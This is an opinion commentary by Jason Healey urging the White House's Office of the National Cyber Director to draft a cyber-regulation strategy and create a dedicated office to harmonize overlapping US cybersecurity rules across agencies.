Creating a new office of cyber-regulation strategy is the government's best opportunity to improve security and to protect Americans in an increasingly dangerous world.

Jason Healey, Senior Research Scholar, Columbia University School of International and Public Affairs

October 7, 2024

5 Min Read

Source: Martin Shields via Alamy Stock Photo

COMMENTARY

Regulation is the most complex and politically sensitive cybersecurity measure ever undertaken by the US government.  

The most important step the White House can take is starting a cyber-regulation strategy and creating a new office within the Office of the National Cyber Director (ONCD) to drive smart regulation and harmonization. 

**Regulating Cybersecurity: Strategy Needed**

Government mandates, especially ones to regulate an area tied to speech, touch at the heart of the role of government in a free society. They are far more inherently political than most other cybersecurity initiatives, such as building the cyber workforce, a topic for which ONCD has already created a dedicated strategy. 

Cyber regulation is also exceedingly complex. To improve cybersecurity, the government might impose minimum baseline cybersecurity controls for critical infrastructures (for everything from rail to customer information held by banks), charge companies for fraud under the False Claims Act, use securities laws to criminally charge corporate security executives, impose labeling requirements for smart devices, or regulate cybersecurity for broadband Internet access. 

The US government is defaulting to doing all of these, plus many more, all at once. 

Some of these initiatives are more in line with the president's strategy and priorities than others; some are best done first, others later; some might be challenged in court, post-Chevron; and some will impose larger costs, for fewer gains, than others seeking the same end. 

All will create winners and losers. Unlike efforts to fix the cyber workforce, some might even affect the outcome of elections. 

ONCD must accordingly develop a new strategy (or at least a less-formal road map) for regulating cyberspace, laying out the major options and trade-offs, timelines, and measures of success. The final deciders must be the nation's political leadership in the National Security Council and National Economic Council. 

**New White House Office Also Needed**

To ensure the success of the cyber-workforce strategy, ONCD created a dedicated team, led by an assistant national cyber director. ONCD must create another such special office to focus on the far more politically sensitive and complex topic of regulation. 

ONCD's office would work to not just "create a coherent regulatory system and harmonize cybersecurity requirements," as recommended by the American Chamber of Commerce, or oversee a Harmonization Committee, per a recent Senate bill. It would draft the strategy, develop an implementation plan and track completion, develop frameworks to harmonize regulations, champion mutual recognition, and help oversee if regulations are working and at reasonable cost. 

This office would work with other departments and agencies — especially the Cybersecurity Forum for Independent and Executive Branch Regulators and the Cybersecurity and Infrastructure Security Agency, recently tasked to harmonize critical infrastructure regulations.  

And there are a lot regulations needing coordination. Just in the past few months, there is not only the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA), but also: 

1\. Cybersecurity in the Marine Transportation System, "establishing minimum cybersecurity requirements for U.S. flagged vessels" (from the Coast Guard)  

2\. Data Breach Reporting Requirements for telecommunications providers (the Federal Communications Commission) 

3\. Cybersecurity Labeling for Internet of Things (IoT) (FCC) 

4\. Cybersecurity Maturity Model Certification for contractors (Department of Defense) 

5\. Significant Cybersecurity Incident Reporting Requirements for federally approved mortgage lenders (Department of Housing and Urban Development) 

6\. New requirements for US infrastructure-as-a-service (IaaS) providers (Department of Commerce) 

Meanwhile, the Environmental Protection Agency is "increasing inspections and enforcement" of community water systems and "the Centers for Medicare and Medicaid Services (CMS) will be drafting new rules" for hospitals. 

ONCD's harmonization efforts have been solid, led by Nick Leiserson, Brian Scott, and Elizabeth Irwin, among others. But this team is also working on a wide range of other policies and programs, such as including cyber in federal grants to states. Regulation, complex, and politically fraught, deserves a dedicated team and leadership. 

**But It's Close to an Election!**

The next presidential administration may be less eager to regulate than this one, but it will still need a regulatory plan of some sort to coordinate and harmonize between independent agencies and engage with states and the European Union.  

ONCD is staffed not just by political appointees and detailed civil servants — as is the National Security Council, the traditional heart of White House cyber policymaking — but also permanent staff. Starting the work on such a document now can help the smartest policies to survive between administrations and improve predictability for regulated companies. 

This is the White House's best opportunity for perhaps a generation to get this right, to improve security, to protect Americans in an increasingly dangerous world, and to decrease the cost and improve predictability for companies building our digitized economy. 

If the White House doesn't solve other important cyber issues, future administrations will have other chances. The critics fighting regulation will not be so forgiving. 

**About the Author**

Senior Research Scholar, Columbia University School of International and Public Affairs

Jason Healey is a senior research scholar at Columbia University’s School for International and Public Affairs, specializing in cyber-risk and conflict.  Jason was a founding member of both the Office of the National Cyber Director at the White House (2022) and the first cyber command in the world, the Joint Task Force for Computer Network Defense, in 1998. He created Goldman Sachs’ first capabilities for cyber-incident response and threat intelligence and later oversaw the bank’s crisis management and business continuity in Asia. He served as the vice chair of the Financial Services Information Sharing and Analysis Center (FS-ISAC), and is a certified board director (NACD.DC) and information systems security professional (CISSP).

Tag

#intel